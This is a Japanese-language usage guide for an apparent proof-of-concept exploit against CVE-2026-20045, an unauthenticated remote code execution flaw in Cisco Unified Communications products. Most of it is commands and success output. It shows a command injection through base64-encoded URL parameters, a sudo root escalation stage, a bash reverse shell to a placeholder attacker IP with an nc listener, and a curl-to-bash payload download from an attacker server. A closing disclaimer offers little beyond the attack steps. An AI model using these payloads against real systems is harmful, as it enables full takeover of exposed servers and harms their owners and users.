
CVE-2026-20045の概念実証エクスプロイト。Cisco Unified Communications製品における重大な未認証RCEであり、コマンドインジェクションとルート権限昇格を伴うリバースシェルを可能にします。

複数の Cisco Unified Communications 製品に影響を与える 重大なリモートコード実行(RCE) 脆弱性です。パッチが公開される前に、実際の攻撃で悪用が確認されていました。
つまり、攻撃者は影響を受けるシステムをリモートから完全に乗っ取ることが可能です。
PoCスクリプトの実行方法について、使用例 を含む洗練されたガイドです。脆弱なCisco Unified Communicationsターゲット(未パッチのWebインターフェースが公開されている場合)でエクスプロイトが成功した際に、ターミナルに表示される内容 を正確に示しています。絵文字、色付きコードブロック(Markdown経由)、構造化されたセクションで読みやすさを向上させています。😎
ユーザーID、ユーザー名、システム詳細を取得する簡単なコマンドを実行します。
コマンド:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
成功時の表示(成功出力):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 成功の兆候: 緑色の [+] インジケーター、HTTP 200ステータス、出力ブロック内のコマンド結果。出力が表示されなくてもステータスが200なら、静かに成功しています!
自分のマシンに対話型シェルを生成します。まず、リスナーを起動します: nc -lvnp 4444。
コマンド:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
成功時の表示(スクリプトターミナル内):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
リスナー(nc)ターミナルでの表示:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 成功の兆候: スクリプトが成功メッセージを表示。リスナーが即座にルートシェルのプロンプトを取得。そこでコマンドを入力して操作できます!
サーバーからスクリプトをダウンロードして実行します。
コマンド:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
成功時の表示(成功出力):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 成功の兆候: 200ステータスコード。ターゲット(例: ログ/ファイルの確認)または自分のサーバー(ダウンロードログ)で確認。ペイロードが静かな場合、直接の出力はありません。
💡 プロのヒント:
sudo で実行。HTTP管理インターフェース におけるユーザー入力の検証不備により、コマンドインジェクション が発生し、リモートコード実行につながります。
すべてのPoCコードは、許可されたシステム上での倫理的・教育的な使用のみを目的としています。無許可の悪用は違法です。誤用に対する責任は負いません。😈